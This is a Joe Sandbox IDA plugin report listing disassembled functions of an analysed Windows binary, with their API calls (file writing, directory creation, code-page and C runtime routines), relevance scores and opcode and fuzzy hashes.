Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 9cf36ab65f28c9b04027ee335ae8328fb11e2b6cf8ce7f1f76560444cdabb41b
Instruction ID: 3d36e63baa7ae560cbf04ed8cf6eac3c7fba09bfc03d950e51e3b7f514a973e9
Opcode Fuzzy Hash: 9cf36ab65f28c9b04027ee335ae8328fb11e2b6cf8ce7f1f76560444cdabb41b
Instruction Fuzzy Hash: B701DB36721326EBC7218B6DDC44A6A7B98EF85FA1B248624F90ED7240E731D900C7F1

Function 00D59F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00D5CC94,00000001,?,?,?,00000000,00D64ECD,?,?,?), ref: 00D59F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00D64ECD,?,?,?,?,?,00D64972,?), ref: 00D59F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00D5CC94,00000001,?,?), ref: 00D59FB8

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 71c1ae1303a9c18ee8e4660a4b2cf23afac24f701ede49e4c3ef255e2ca29288
Instruction ID: 9462c69b51e555624d0b543ca4146b7ec322bf0de32158f6fbca715ef02c3f45
Opcode Fuzzy Hash: 71c1ae1303a9c18ee8e4660a4b2cf23afac24f701ede49e4c3ef255e2ca29288
Instruction Fuzzy Hash: 8631E471208315DBDF208F18D858B6ABBA4EF50B56F084659FC49DB281C774D94CCBB2

Function 00D5A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A261
GetLastError.KERNEL32(?,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A27E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: f0075f4d52268176fc3d0576ac67317da4d97b283970572552b87d5edac96413
Instruction ID: 2382d8495a5160e31e05e1e071c8444415c7c88d718b7812bdc4720cc37eaf35
Opcode Fuzzy Hash: f0075f4d52268176fc3d0576ac67317da4d97b283970572552b87d5edac96413
Instruction Fuzzy Hash: 360192311502346ADF329B7C4C07BED3348AF06B83F085652FD45DA151DB66CA8986BB

Function 00D7AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D7B019

Strings

, xrefs: 00D7B05E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 607b728009e91d581dce5c831dc088ba20e12df8ed68daa6cbab0138e5454388
Instruction ID: 149fdfa0e220eea2557685fd5727b93f45688a95906516271ac40bd7570213b5
Opcode Fuzzy Hash: 607b728009e91d581dce5c831dc088ba20e12df8ed68daa6cbab0138e5454388
Instruction Fuzzy Hash: CF41F57050434C9EDF218A28CC95BFABBA9EB45318F5844EEE99E87142F3359A458F70

Function 00D7A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00D7A79D

Strings

LCMapStringEx, xrefs: 00D7A73D, 00D7A747

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: bf9a1a998c6b171b2edd7fe3b7ac9f381f5512c9a96c2fafd1d30cf01ff07c51
Instruction ID: 65f98625863dd89eae7ff27a4a375a3560a40b95b09e0460a73893abb6a0cf86
Opcode Fuzzy Hash: bf9a1a998c6b171b2edd7fe3b7ac9f381f5512c9a96c2fafd1d30cf01ff07c51
Instruction Fuzzy Hash: AC01E57254420DBBCF066FA4DC06DEE3F66EF48760F058164FE1866160DA72D931EBA2

Function 00D7A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D79D2F), ref: 00D7A715

Strings

InitializeCriticalSectionEx, xrefs: 00D7A6E5

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 5dacb97b18b5dd655f10a3ddd1854cab22b26d16b9b0933c94eb1e01f2e2fffc
Instruction ID: 935dccc83a1f665992c8025312ee72ad5b6da00f97c244f572be3c51a86f31e4
Opcode Fuzzy Hash: 5dacb97b18b5dd655f10a3ddd1854cab22b26d16b9b0933c94eb1e01f2e2fffc
Instruction Fuzzy Hash: 01F0E23164531CFBCB056F64DC06DAE7F61EF84B60B408164FC1D5A260EA728E20EBB1

Function 00D7A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00D7A5AE

Strings

FlsAlloc, xrefs: 00D7A58A

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 512b0cbeb974707019d075c01d8fffd75312200ac90db4ece4bdb3535af4ca1a
Instruction ID: dd7acf40462e435b4c37495aa470565cdfc246be5433ac4f1a5bb36dcf295cb8
Opcode Fuzzy Hash: 512b0cbeb974707019d075c01d8fffd75312200ac90db4ece4bdb3535af4ca1a
Instruction Fuzzy Hash: 98E0E570B55328AFC2107B68AC069AEBB54DB95F21B414155FC0D97350FD718E0097F6

Function 00D7329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00D732AF

Strings

FlsAlloc, xrefs: 00D7329E, 00D732A8

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 283abb5ae80ad5682fb28b7c764f58dbdc945404ab942f83407cfc5119ef7e37
Instruction ID: facdab630de274ab82f01cc1de3146b06597c10e705554f33a45f2cd24eed959
Opcode Fuzzy Hash: 283abb5ae80ad5682fb28b7c764f58dbdc945404ab942f83407cfc5119ef7e37
Instruction Fuzzy Hash: A2D012217817346ED61032967C039AABE44CA01FB5B454192FE0C5A256B561455453F9

Function 00D6E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6E20B

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Strings

3To, xrefs: 00D6E1F9, 00D6E205

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 6f60bff6f827b649d80e653636dd0d64cf02ec9526503c6fec1f210efeabec35
Instruction ID: 04f2935f3759fddbddab2842288f03f468f5efa657c03e04167734de5ecc6206
Opcode Fuzzy Hash: 6f60bff6f827b649d80e653636dd0d64cf02ec9526503c6fec1f210efeabec35
Instruction Fuzzy Hash: DCB012D676E002BE320C31007D1AD76031DC9D4B60330801BF106D4080D9408D094132

Function 00D7B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00D7AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D7B1A5,?), ref: 00D7AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D7B1EA,?,00000000), ref: 00D7B3C4
GetCPInfo.KERNEL32(00000000,00D7B1EA,?,?,?,00D7B1EA,?,00000000), ref: 00D7B3D7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4d02d1de84c6f9d6d76a6f8fa24e225f2f1fb998a07682e808c0d8162ab04773
Instruction ID: 4706d76539f37acccbb62a3578b9e41d6fc9723e97e4472998f4e0795a2c9ebb
Opcode Fuzzy Hash: 4d02d1de84c6f9d6d76a6f8fa24e225f2f1fb998a07682e808c0d8162ab04773
Instruction Fuzzy Hash: 4651F4709002159EDB249F75C8817BEBBE5EF41328F18C56FE09A8B252F7359541CBB1

Function 00D51385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D51385

Part of subcall function 00D56057: __EH_prolog.LIBCMT ref: 00D5605C

Part of subcall function 00D5C827: __EH_prolog.LIBCMT ref: 00D5C82C
Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C86F
Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C893

new.LIBCMT ref: 00D513FE

Part of subcall function 00D5B07D: __EH_prolog.LIBCMT ref: 00D5B082

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f4ee53a6d96342c8e7d80c5be5740b061533823ff01aa0d1447bde95ae6b2b42
Instruction ID: 84bec4c327054c9c74451c80c10d7aa25d8cb5816ef040cee1a6ce00c32ee356
Opcode Fuzzy Hash: f4ee53a6d96342c8e7d80c5be5740b061533823ff01aa0d1447bde95ae6b2b42
Instruction Fuzzy Hash: 094116B0805B40DED724DF798485AE7FBE5FB18310F544A2ED9EE83282DB326558CB25

Function 00D51380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D51385

Part of subcall function 00D56057: __EH_prolog.LIBCMT ref: 00D5605C

Part of subcall function 00D5C827: __EH_prolog.LIBCMT ref: 00D5C82C
Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C86F
Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C893

new.LIBCMT ref: 00D513FE

Part of subcall function 00D5B07D: __EH_prolog.LIBCMT ref: 00D5B082

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 67d3972fcc0be9aba3a4561d11d1eb11fdc2922eca75e816967dbefc353f2b83
Instruction ID: 34663c9a337ce28bd572592d14e36f9a3e07abcf1c990e693a7b53dfc6b40a18
Opcode Fuzzy Hash: 67d3972fcc0be9aba3a4561d11d1eb11fdc2922eca75e816967dbefc353f2b83
Instruction Fuzzy Hash: 8B4127B0805B409ED724DF798485AE7FBE5FF18300F544A2ED9EE83282DB326558CB25

Function 00D7B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00D78FA5: GetLastError.KERNEL32(?,00D90EE8,00D73E14,00D90EE8,?,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D78FA9
Part of subcall function 00D78FA5: _free.LIBCMT ref: 00D78FDC
Part of subcall function 00D78FA5: SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D7901D
Part of subcall function 00D78FA5: _abort.LIBCMT ref: 00D79023

Part of subcall function 00D7B2AE: _abort.LIBCMT ref: 00D7B2E0
Part of subcall function 00D7B2AE: _free.LIBCMT ref: 00D7B314

Part of subcall function 00D7AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D7B1A5,?), ref: 00D7AF46

_free.LIBCMT ref: 00D7B200
_free.LIBCMT ref: 00D7B236

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: c1a854a5700aa28347cf7b781650e54d84fa748064a76fde20ba6962cffdd904
Instruction ID: b9089a6f0d3d5749ccc2c156ce45b2cc18c2be455e6f48a19f60c732a46ed386
Opcode Fuzzy Hash: c1a854a5700aa28347cf7b781650e54d84fa748064a76fde20ba6962cffdd904
Instruction Fuzzy Hash: 9231D331901208AFDB10EFA9C845B6DBBE5EF41330F65809AE81C9B292FB719D41DB74

Function 00D5971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D59EDC,?,?,00D57867), ref: 00D597A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D59EDC,?,?,00D57867), ref: 00D597DB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 829794050259b487d075fb7b55d5064fe53cd2da5e324565806399d6af8c10ba
Instruction ID: 267e6aeedd06ef5ef42e87b2fcbedff6943f40f2aed23e9854dad48e0ada57e5
Opcode Fuzzy Hash: 829794050259b487d075fb7b55d5064fe53cd2da5e324565806399d6af8c10ba
Instruction Fuzzy Hash: EB21F6B1110748EFDB308F24C885BA7B7E8EB49765F04492EFDE586191C374AC488B71

Function 00D59D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D57547,?,?,?,?), ref: 00D59D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00D59E2C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 62189e1c5eea436a85c4885a54d6e790a4264c63fabbf0551de2214511a61ab8
Instruction ID: da805473e77297040019b705e33eb5933d8cb76a9f3dcb94493f7acdcb6dd2e4
Opcode Fuzzy Hash: 62189e1c5eea436a85c4885a54d6e790a4264c63fabbf0551de2214511a61ab8
Instruction Fuzzy Hash: 8B219E31148246EBCB14DE24C8A1AABFBF4AB95705F08481EBCC187181D239EA0C9BB1

Function 00D7A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00D7A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D7A4C5

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
